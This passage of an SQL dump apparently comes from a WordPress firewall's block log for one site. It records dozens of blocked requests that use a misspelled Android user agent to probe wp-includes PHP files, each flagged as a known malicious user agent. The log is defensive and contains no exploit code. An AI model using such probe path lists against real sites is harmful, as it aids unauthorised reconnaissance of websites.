User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2NvbG9ycy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133874,1699931254.639417,1699931254.630400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/border.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JvcmRlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133875,1699931437.070290,1699931437.061600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-dependencies.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWRlcGVuZGVuY2llcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133883,1699931459.279154,1699931459.270200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133876,1699931428.493602,1699931428.484900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-classic-to-block-menu-converter.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWNsYXNzaWMtdG8tYmxvY2stbWVudS1jb252ZXJ0ZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133877,1699931420.277515,1699931420.268600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-template.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133878,1699931415.221389,1699931415.212600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-parser-frame.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXBhcnNlci1mcmFtZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133882,1699931465.083379,1699931465.074500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-navigation-fallback.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW5hdmlnYXRpb24tZmFsbGJhY2sucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133879,1699931411.196359,1699931411.187200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-parser-block.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXBhcnNlci1ibG9jay5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133966,1699932154.821551,1699932154.799900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133880,1699931406.687185,1699931406.678200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-editor-context.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLWVkaXRvci1jb250ZXh0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133881,1699931485.195031,1699931485.172700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133905,1699931510.410070,1699931510.401000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-textdomain-registry.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRleHRkb21haW4tcmVnaXN0cnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133906,1699931500.301773,1699931500.293000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134027,1699932605.385787,1699932605.371400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/lib/namespaced.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbGliL25hbWVzcGFjZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133957,1699932241.433712,1699932241.424300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-block-patterns-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWJsb2NrLXBhdHRlcm5zLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133907,1699931926.069060,1699931926.056700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-text-replacement.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtdGV4dC1yZXBsYWNlbWVudC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133908,1699931916.719672,1699931916.711000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-tag-processor.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtdGFnLXByb2Nlc3Nvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133909,1699931912.771141,1699931912.762200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-span.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtc3Bhbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133956,1699932248.432527,1699932248.423800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWJsb2NrLXJlbmRlcmVyLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133910,1699931908.151427,1699931908.142800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-processor.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtcHJvY2Vzc29yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133911,1699931903.396347,1699931903.387000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-processor-state.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtcHJvY2Vzc29yLXN0YXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133912,1699931896.697884,1699931896.688600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-open-elements.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtb3Blbi1lbGVtZW50cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134103,1699994971.884911,1699994971.863000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133955,1699932252.895477,1699932252.886800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWJsb2NrLXR5cGVzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133913,1699931892.093230,1699931892.083300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-attribute-token.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtYXR0cmlidXRlLXRva2VuLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134028,1699932903.607072,1699932903.324600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-meta.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 